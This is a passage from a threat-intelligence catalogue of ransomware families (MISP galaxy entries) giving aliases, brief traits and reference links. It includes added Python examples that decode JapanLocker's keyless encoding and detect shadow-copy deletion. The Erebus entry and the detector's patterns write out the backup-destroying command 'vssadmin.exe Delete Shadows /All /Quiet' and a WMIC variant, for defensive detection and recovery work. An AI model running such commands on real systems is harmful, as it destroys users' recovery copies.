This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Hidden Tear >> APT Ransomware + RemindMe (https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html) > FuckSociety.

The tag is: misp-galaxy:ransomware="FuckSociety Ransomware"

Table 8110. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html

PayDOS Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Batch file; passcode: AES1014DW256 or RSA1014DJW2048.

The tag is: misp-galaxy:ransomware="PayDOS Ransomware"

PayDOS Ransomware is also known as:

  • Serpent Ransomware

Table 8111. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/paydos-ransomware-serpent.html

https://www.bleepingcomputer.com/news/security/ransomware-goes-retro-with-paydos-and-serpent-written-as-batch-files/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

https://www.proofpoint.com/us/threat-insight/post/new-serpent-ransomware-targets-danish-speakers

zScreenLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="zScreenLocker Ransomware"

Table 8112. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/zscreenlocker-ransomware.html

https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/

https://twitter.com/struppigel/status/794077145349967872

Gremit Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Gremit Ransomware"

Table 8113. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/gremit-ransomware.html

https://twitter.com/struppigel/status/794444032286060544

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

Hollycrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Hollycrypt Ransomware"

Table 8114. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html

BTCLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="BTCLocker Ransomware"

BTCLocker Ransomware is also known as:

  • BTC Ransomware

Table 8115. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html

Kangaroo Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda.

The tag is: misp-galaxy:ransomware="Kangaroo Ransomware"

Table 8116. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html

https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/

DummyEncrypter Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="DummyEncrypter Ransomware"

Table 8117. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/dummyencrypter-ransomware.html

Encryptss77 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Encryptss77 Ransomware"

Encryptss77 Ransomware is also known as:

  • SFX Monster Ransomware

Table 8118. Table References

Links

http://virusinfo.info/showthread.php?t=201710

https://id-ransomware.blogspot.co.il/2016/11/encryptss77-ransomware.html

WinRarer Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="WinRarer Ransomware"

Table 8119. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/winrarer-ransomware.html

Russian Globe Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Russian Globe Ransomware"

Table 8120. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html

ZeroCrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="ZeroCrypt Ransomware"

Table 8121. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html

RotorCrypt(RotoCrypt, Tar) Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="RotorCrypt(RotoCrypt, Tar) Ransomware"

RotorCrypt(RotoCrypt, Tar) Ransomware is also known as:

  • RotorCrypt

  • RotoCrypt

  • Tar Ransomware

Table 8122. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1050117756094476289

Ishtar Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Ishtar Ransomware"

Table 8123. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html

MasterBuster Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="MasterBuster Ransomware"

Table 8124. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html

https://twitter.com/struppigel/status/791943837874651136

JackPot Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="JackPot Ransomware"

JackPot Ransomware is also known as:

  • Jack.Pot Ransomware

Table 8125. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/jackpot-ransomware.html

https://twitter.com/struppigel/status/791639214152617985

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

ONYX Ransomeware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Georgian ransomware.

The tag is: misp-galaxy:ransomware="ONYX Ransomeware"

Table 8126. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/onyx-ransomware.html

https://twitter.com/struppigel/status/791557636164558848

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

IFN643 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="IFN643 Ransomware"

Table 8127. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ifn643-ransomware.html

https://twitter.com/struppigel/status/791576159960072192

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

Alcatraz Locker Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Alcatraz Locker Ransomware"

Table 8128. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

https://twitter.com/PolarToffee/status/792796055020642304

Esmeralda Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Esmeralda Ransomware"

Table 8129. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html

https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/

EncrypTile Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="EncrypTile Ransomware"

Table 8130. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/encryptile-ransomware.html

Fileice Ransomware Survey Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Sample of how the hacker tricks the user using the survey method: https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png The hacker definitely has a sense of humor: https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG

The tag is: misp-galaxy:ransomware="Fileice Ransomware Survey Ransomware"

Table 8131. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/fileice-ransomware-survey.html

https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

CryptoWire Ransomeware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="CryptoWire Ransomeware"

Table 8132. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/cryptowire-ransomware.html

https://twitter.com/struppigel/status/791554654664552448

https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/

Hucky Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Based on Locky.

The tag is: misp-galaxy:ransomware="Hucky Ransomware"

Hucky Ransomware is also known as:

  • Hungarian Locky Ransomware

Table 8133. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html

https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe

https://twitter.com/struppigel/status/846241982347427840

Winnix Cryptor Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Winnix Cryptor Ransomware"

Table 8134. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html

https://twitter.com/PolarToffee/status/811940037638111232

AngryDuck Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Demands 10 BTC.

The tag is: misp-galaxy:ransomware="AngryDuck Ransomware"

Table 8135. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html

https://twitter.com/demonslay335/status/790334746488365057

Lock93 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Lock93 Ransomware"

Table 8136. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/lock93-ransomware.html

https://twitter.com/malwrhunterteam/status/789882488365678592

ASN1 Encoder Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="ASN1 Encoder Ransomware"

Table 8137. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html

https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/

Click Me Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker tries to get the user to play a game, but when the user clicks the button there is no game, just the 20 pictures in the .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif

The tag is: misp-galaxy:ransomware="Click Me Ransomware"

Table 8138. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html

https://www.youtube.com/watch?v=Xe30kV4ip8w

AiraCrop Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="AiraCrop Ransomware"

Table 8139. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

JapanLocker Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. Its file "encryption" is a keyless chain of Base64 encoding, ROT13 and top-bottom swapping.

The tag is: misp-galaxy:ransomware="JapanLocker Ransomware"

JapanLocker Ransomware is also known as:

  • SHC Ransomware

  • SHCLocker

  • SyNcryption

Table 8140. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker

https://github.com/fortiguard-lion/schRansomwareDecryptor/blob/master/schRansomwarev1_decryptor.php

https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots
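The practical consequence of the JapanLocker scheme is that none of its three steps uses a key, so a file can be recovered from the ciphertext alone. The following is an added example, not code from the MISP galaxy or from the decryptor linked above: it implements a Base64, ROT13 and half-swap chain and its inverse. The order of the steps and the meaning of "top-bottom swapping" (taken here as exchanging the first and second halves of the string) are assumptions, since the page only names the primitives.

```python
import base64
import codecs

# Added example: a keyless "encryption" chain built from Base64, ROT13 and
# swapping the top and bottom halves of the data, in the spirit of the
# JapanLocker scheme. The order of the three steps and the exact meaning of
# "top-bottom swapping" (assumed here: exchange the first and second half of
# the string) are assumptions; the page only names the three primitives.


def swap_halves(s: str) -> str:
    """Exchange the first and second halves of a string.

    For odd lengths the middle character stays in place, which makes the
    operation its own inverse, so the same function undoes the swap.
    """
    half = len(s) // 2
    if len(s) % 2:
        return s[half + 1:] + s[half] + s[:half]
    return s[half:] + s[:half]


def weak_encrypt(plaintext: bytes) -> str:
    """Base64 -> ROT13 -> swap halves. No key is involved anywhere."""
    b64 = base64.b64encode(plaintext).decode("ascii")
    rot = codecs.encode(b64, "rot_13")  # only letters change; '+', '/', '=' stay
    return swap_halves(rot)


def weak_decrypt(ciphertext: str) -> bytes:
    """Undo the three steps in reverse order. Needs nothing but the ciphertext."""
    rot = swap_halves(ciphertext)
    b64 = codecs.decode(rot, "rot_13")
    return base64.b64decode(b64, validate=True)


def looks_like_weak_ciphertext(blob: str) -> bool:
    """Cheap triage check: does undoing the swap and ROT13 yield valid Base64?

    Useful when sorting files on a compromised web host, where the
    "encrypted" files are text rather than binary.
    """
    try:
        weak_decrypt(blob)
        return True
    except (ValueError, UnicodeError):
        return False


if __name__ == "__main__":
    sample = b"constructed sample: nothing in this scheme depends on a secret"
    blob = weak_encrypt(sample)
    assert weak_decrypt(blob) == sample
    print("ciphertext:", blob)
    print("recovered :", weak_decrypt(blob))
```

Because every step is a fixed, invertible transformation, `weak_decrypt` recovers the plaintext without any key material; that is the property the public decryptor relies on.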

Anubis Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. Based on EDA2.

The tag is: misp-galaxy:ransomware="Anubis Ransomware"

Table 8141. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html

http://nyxbone.com/malware/Anubis.html

XTPLocker 5.0 Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="XTPLocker 5.0 Ransomware"

Table 8142. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/xtplocker-ransomware.html

Exotic Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. Also encrypts executables.

The tag is: misp-galaxy:ransomware="Exotic Ransomware"

Table 8143. Table References

Links

https://www.bleepingcomputer.com/news/security/eviltwins-exotic-ransomware-targets-executable-files/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/exotic-ransomware

https://id-ransomware.blogspot.co.il/2016/10/exotic-ransomware.html

APT Ransomware v.2

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. There is no point in paying the ransom: the files are completely destroyed.

The tag is: misp-galaxy:ransomware="APT Ransomware v.2"

Table 8144. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/apt-ransomware-2.html

Windows_Security Ransonware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Windows_Security Ransonware"

Windows_Security Ransonware is also known as:

  • WS Go Ransonware

  • Trojan.Encoder.6491

Windows_Security Ransonware has relationships with:

  • similar: misp-galaxy:ransomware="Encoder.xxxx" with estimative-language:likelihood-probability="likely"

Table 8145. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html

https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2

NCrypt Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="NCrypt Ransomware"

Table 8146. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html

Venis Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. Contact e-mail: devVenisRansom@protonmail.com

The tag is: misp-galaxy:ransomware="Venis Ransomware"

Table 8147. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/venis-ransomware.html

https://twitter.com/Antelox/status/785849412635521024

http://pastebin.com/HuK99Xmj

Enigma 2 Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Enigma 2 Ransomware"

Table 8148. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/enigma-2-ransomware.html

Deadly Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files. The analysed sample is set to encrypt only in 2017.

The tag is: misp-galaxy:ransomware="Deadly Ransomware"

Deadly Ransomware is also known as:

  • Deadly for a Good Purpose Ransomware

Table 8149. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/deadly-ransomware.html

https://twitter.com/malwrhunterteam/status/785533373007728640

Comrade Circle Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Comrade Circle Ransomware"

Table 8150. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html

Globe2 Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Globe2 Ransomware"

Globe2 Ransomware is also known as:

  • Purge Ransomware

Globe2 Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Globe3 Ransomware" with estimative-language:likelihood-probability="likely"

Table 8151. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html

https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221

Kostya Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Kostya Ransomware"

Table 8152. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html

http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

Fs0ciety Locker Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, although anyone can be affected. It is distributed through email spam, fake updates and malicious attachments, and encrypts user files including music, MS Office and Open Office documents, pictures, videos and shared online files.

The tag is: misp-galaxy:ransomware="Fs0ciety Locker Ransomware"

Table 8153. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.html

Erebus Ransomware

The ransom note is written in English, so it can infect users worldwide. It is spread through email spam, fake updates, malicious attachments and similar vectors, and encrypts all user files, including music, MS Office and Open Office documents, pictures, videos and shared online files. After the files are encrypted, the Volume Shadow Copies are deleted with the following command: vssadmin.exe Delete Shadows /All /Quiet

The tag is: misp-galaxy:ransomware="Erebus Ransomware"

Table 8154. Table References

Links

https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html
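The shadow-copy deletion Erebus performs is one of the most reliable process-creation signals for ransomware in general, because it has almost no legitimate use outside scheduled maintenance. The following detection logic is an added example, not code from the MISP galaxy: it parses a handful of constructed process-creation records (the key=value layout and field names are assumptions, not real Sysmon or Windows Security log formats) and flags the vssadmin form named on the page, plus the equivalent WMIC `shadowcopy delete` invocation, which goes beyond the page. Events whose parent process runs from a user-writable location are rated higher.

```python
import re

# Added example (not from the MISP galaxy): flag process-creation events in
# which shadow copies are deleted, the step Erebus performs with
# "vssadmin.exe Delete Shadows /All /Quiet". The WMIC equivalent is a common
# variant added here for completeness. The log lines and their key=value
# field names are constructed for this example and are not real Sysmon output.

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

SHADOW_DELETE_PATTERNS = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.IGNORECASE),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete\b", re.IGNORECASE),
]

# A parent launched from a user-writable location makes the event far more
# suspicious than an administrator running vssadmin from a console.
_USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.IGNORECASE)

# Constructed sample records: one Erebus-style deletion, one benign listing,
# one WMIC deletion from a console, one unrelated process.
SAMPLE_EVENTS = [
    r'ts=2016-09-30T10:12:01Z host=WS01 image=C:\Windows\System32\vssadmin.exe '
    r'cmdline="vssadmin.exe Delete Shadows /All /Quiet" '
    r'parent=C:\Users\bob\AppData\Local\Temp\erebus.exe',
    r'ts=2016-09-30T10:12:05Z host=WS01 image=C:\Windows\System32\vssadmin.exe '
    r'cmdline="vssadmin.exe list shadows" parent=C:\Windows\System32\cmd.exe',
    r'ts=2016-09-30T10:13:40Z host=WS02 image=C:\Windows\System32\wbem\WMIC.exe '
    r'cmdline="wmic shadowcopy delete" parent=C:\Windows\System32\cmd.exe',
    r'ts=2016-09-30T10:14:02Z host=WS02 image=C:\Windows\System32\notepad.exe '
    r'cmdline="notepad.exe README.txt" parent=C:\Windows\explorer.exe',
]


def parse_event(line: str) -> dict:
    """Parse one constructed key=value record; values may be double-quoted."""
    return {key: quoted if quoted else bare for key, quoted, bare in _KV.findall(line)}


def detect_shadow_deletion(lines):
    """Return one finding per event whose command line destroys shadow copies."""
    findings = []
    for line in lines:
        event = parse_event(line)
        cmdline = event.get("cmdline", "")
        if not any(p.search(cmdline) for p in SHADOW_DELETE_PATTERNS):
            continue
        parent = event.get("parent", "")
        findings.append({
            "ts": event.get("ts"),
            "host": event.get("host"),
            "parent": parent,
            "cmdline": cmdline,
            # A user-writable parent path is the strongest ransomware signal here.
            "severity": "high" if _USER_WRITABLE.search(parent) else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_shadow_deletion(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['ts']} {f['host']} parent={f['parent']} :: {f['cmdline']}")
```

The benign `vssadmin.exe list shadows` record is deliberately left unflagged: matching on the image name alone would page on every backup check, so the rule keys on the `delete shadows` / `shadowcopy delete` arguments and uses the parent path only to grade severity.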

WannaCry

According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations, with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry or Wanna Decryptor, was discovered on the morning of May 12, 2017 by an independent security researcher and spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT on May 12, 2017. Open-source reporting indicates a requested ransom of 0.1781 bitcoins, roughly $300 US.

The tag is: misp-galaxy:ransomware="WannaCry"

WannaCry is also known as:

  • WannaCrypt

  • WannaCry

  • WanaCrypt0r

  • WCrypt

  • WCRY

WannaCry has relationships with:

  • similar: misp-galaxy:malpedia="WannaCryptor" with estimative-language:likelihood-probability="likely"

Table 8155. Table References

Links

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

.CryptoHasYou.

Ransomware

The tag is: misp-galaxy:ransomware=".CryptoHasYou."

Table 8156. Table References

Links

http://www.nyxbone.com/malware/CryptoHasYou.html

777

Ransomware

The tag is: misp-galaxy:ransomware="777"

777 is also known as:

  • Sevleg

Table 8157. Table References

Links

https://decrypter.emsisoft.com/777

7ev3n

Ransomware

The tag is: misp-galaxy:ransomware="7ev3n"

7ev3n is also known as:

  • 7ev3n-HONE$T

7ev3n has relationships with:

  • similar: misp-galaxy:malpedia="7ev3n" with estimative-language:likelihood-probability="likely"

Table 8158. Table References

Links

https://github.com/hasherezade/malware_analysis/tree/master/7ev3n

https://www.youtube.com/watch?v=RDNbH5HDO1E&feature=youtu.be

http://www.nyxbone.com/malware/7ev3n-HONE$T.html

8lock8

Ransomware. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="8lock8"

Table 8159. Table References

Links

http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-ittxt/

AiraCrop

Ransomware. Related to TeamXRat.

